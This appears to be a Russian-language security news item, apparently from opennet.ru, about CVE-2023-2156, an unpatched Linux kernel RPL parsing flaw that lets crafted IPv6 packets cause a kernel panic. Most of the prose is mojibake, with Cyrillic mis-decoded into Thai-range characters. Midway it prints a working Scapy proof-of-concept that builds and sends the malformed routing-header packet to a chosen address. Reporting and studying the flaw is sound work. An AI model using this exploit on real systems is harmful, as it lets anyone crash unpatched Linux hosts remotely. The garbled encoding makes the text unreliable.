ะ ะฐัะบัััั ัะฒะตะดะตะฝะธั ะพ ะฝะตะธัะฟัะฐะฒะปะตะฝะฝะพะน (0-day) ััะทะฒะธะผะพััะธ (CVE-2023-2156) ะฒ ัะดัะต Linux, ะฟะพะทะฒะพะปัััะตะน ะพััะฐะฝะพะฒะธัั ัะฐะฑะพัั ัะธััะตะผั ัะตัะตะท ะพัะฟัะฐะฒะบั ัะฟะตัะธะฐะปัะฝะพ ะพัะพัะผะปะตะฝะฝัั ะฟะฐะบะตัะพะฒ IPv6 (packet-of-death). ะัะพะฑะปะตะผะฐ ะฟัะพัะฒะปัะตััั ัะพะปัะบะพ ะฟัะธ ะฒะบะปััะตะฝะธะธ ะฟะพะดะดะตัะถะบะธ ะฟัะพัะพะบะพะปะฐ RPL (Routing Protocol for Low-Power and Lossy Networks), ะบะพัะพััะน ะฒ ะดะธัััะธะฑััะธะฒะฐั ะฟะพ ัะผะพะปัะฐะฝะธั ะพัะบะปัััะฝ ะธ ะฟัะธะผะตะฝัะตััั, ะณะปะฐะฒะฝัะผ ะพะฑัะฐะทะพะผ, ะฝะฐ ะฒัััะฐะธะฒะฐะตะผัั ััััะพะนััะฒะฐั , ัะฐะฑะพัะฐััะธั ะฒ ะฑะตัะฟัะพะฒะพะดะฝัั ัะตััั ั ะฑะพะปััะพะน ะฟะพัะตัะตะน ะฟะฐะบะตัะพะฒ.
ะฃัะทะฒะธะผะพััั ะฒัะทะฒะฐะฝะฐ ะฝะตะบะพััะตะบัะฝะพะน ะพะฑัะฐะฑะพัะบะพะน ะฒะฝะตัะฝะธั ะดะฐะฝะฝัั ะฒ ะบะพะดะต ัะฐะทะฑะพัะฐ ะฟัะพัะพะบะพะปะฐ RPL, ะบะพัะพัะฐั ะฟัะธะฒะพะดะธั ะบ ััะฐะฑะฐััะฒะฐะฝะธั assert-ัะฑะพั ะธ ะฟะตัะตั ะพะดั ัะดัะฐ ะฒ ัะพััะพัะฝะธะต panic. ะัะธ ัะฐะทะผะตัะตะฝะธะธ ะฒ ััััะบัััะต k_buff (Socket Buffer) ะดะฐะฝะฝัั , ะฟะพะปััะตะฝะฝัั ะฒ ัะตะทัะปััะฐัะต ัะฐะทะฑะพัะฐ ะทะฐะณะพะปะพะฒะบะฐ ะฟะฐะบะตัะฐ IPv6 RPL, ะตัะปะธ ะฟะพะปะต CmprI ะฒัััะฐะฒะปะตะฝะพ ะฒ ะทะฝะฐัะตะฝะธะต 15, ะฟะพะปะต Segleft ะฒ 1, ะฐ CmprE ะฒ 0, 48-ะฑะฐะนัะฝัะน ะฒะตะบัะพั ั ะฐะดัะตัะฐะผะธ ัะฐัะฟะฐะบะพะฒัะฒะฐะตััั ะดะพ 528 ะฑะฐะนั ะธ ะฒะพะทะฝะธะบะฐะตั ัะธััะฐัะธั, ะบะพะณะดะฐ ะฒัะดะตะปะตะฝะฝะพะน ะดะปั ะฑััะตัะฐ ะฟะฐะผััะธ ะพะบะฐะทัะฒะฐะตััั ะฝะตะดะพััะฐัะพัะฝะพ. ะ ััะพะผ ัะปััะฐะต ะฒ ััะฝะบัะธะธ skb_push, ะฟัะธะผะตะฝัะตะผะพะน ะดะปั ะฟะพะผะตัะตะฝะธั ะดะฐะฝะฝัั ะฒ ััััะบัััั, ััะฐะฑะฐััะฒะฐะตั ะฟัะพะฒะตัะบะฐ ะฝะฐ ะฝะตัะพัะฐะทะผะตัะฝะพััั ัะฐะทะผะตัะฐ ะดะฐะฝะฝัั ะธ ะฑััะตัะฐ, ะณะตะฝะตัะธััััะฐั ัะพััะพัะฝะธะต panic, ััะพะฑั ะฟัะตะดะพัะฒัะฐัะธัั ะทะฐะฟะธัั ะทะฐ ะณัะฐะฝะธัั ะฑััะตัะฐ.
ะัะธะผะตั ัะบัะฟะปะพะธัะฐ: # Weโll use Scapy to craft the packet from scapy.all import * import socket # Use the IPv6 from your LAN interface DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # We use sockets to send the packet sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft the packet # Type = 3 makes this an RPL packet # Addresses contains 3 addresses, but because CmprI is 15, # each octet of the first two addresses is treated as a compressed address # Segleft = 1 to trigger the amplification # lastentry = 0xf0 sets CmprI to 15 and CmprE to 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=[ยซa8::ยป, ยซa7::ยป, ยซa6::ยป], segleft=1, lastentry=0xf0) # Send this evil packet sockfd.sendto(bytes(p), (DST_ADDR, 0))
ะัะธะผะตัะฐัะตะปัะฝะพ, ััะพ ัะฐะทัะฐะฑะพััะธะบะธ ัะดัะฐ ะฑัะปะธ ัะฒะตะดะพะผะปะตะฝั ะพะฑ ััะทะฒะธะผะพััะธ ะตัั ะฒ ัะฝะฒะฐัะต 2022 ะณะพะดะฐ ะธ ะทะฐ ะฟัะพัะตะดัะธะต 15 ะผะตัััะตะฒ ััะธ ัะฐะทะฐ ะฟะพะฟััะฐะปะธัั ััััะฐะฝะธัั ะฟัะพะฑะปะตะผั, ะฒัะฟัััะธะฒ ะฟะฐััะธ ะฒ ัะตะฝััะฑัะต 2022 , ะพะบััะฑัะต 2022 ะธ ะฐะฟัะตะปะต 2023 ะณะพะดะฐ, ะฝะพ ะบะฐะถะดัะน ัะฐะท ะธัะฟัะฐะฒะปะตะฝะธะน ะพะบะฐะทัะฒะฐะปะพัั ะฝะตะดะพััะฐัะพัะฝะพ ะธ ััะทะฒะธะผะพััั ัะดะฐะฒะฐะปะพัั ะฒะพัะฟัะพะธะทะฒะตััะธ. ะ ะบะพะฝะตัะฝะพะผ ััััะต ะฟัะพะตะบั ZDI, ะบะพะพัะดะธะฝะธัะพะฒะฐะฒัะธะน ัะฐะฑะพัั ะฟะพ ััััะฐะฝะตะฝะธั ััะทะฒะธะผะพััะธ, ะฟัะธะฝัะป ัะตัะตะฝะธะต ัะฐัะบัััั ะดะตัะฐะปัะฝัั ะธะฝัะพัะผะฐัะธั ะพะฑ ััะทะฒะธะผะพััะธ, ะฝะต ะดะพะถะธะดะฐััั ะฟะพัะฒะปะตะฝะธั ัะฐะฑะพัะฐััะตะณะพ ะธัะฟัะฐะฒะปะตะฝะธั ะฒ ัะดัะต.
ะขะฐะบะธะผ ะพะฑัะฐะทะพะผ ััะทะฒะธะผะพััั ะดะพ ัะธั
ะฟะพั ะพััะฐัััั ะฝะตะธัะฟัะฐะฒะปะตะฝะฝะพะน. ะ ัะพะผ ัะธัะปะต ะฝะต ัััะตะบัะธะฒะตะฝ ะฟะฐัั, ะฒะพัะตะดัะธะน ะฒ ัะดัะพ 6.4-rc2. ะะพะปัะทะพะฒะฐัะตะปัะผ ัะตะบะพะผะตะฝะดัะตััั ะฟัะพะฒะตัะธัั, ััะพ ะฟัะพัะพะบะพะป RPL ะฒ ะธั
ัะธััะตะผะฐั
ะฝะต ะธัะฟะพะปัะทัะตััั, ััะพ ะผะพะถะฝะพ ัะดะตะปะฐัั ะฟัะธ ะฟะพะผะพัะธ ะบะพะผะฐะฝะดั sysctl -a | grep -i rpl_seg_enabled
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru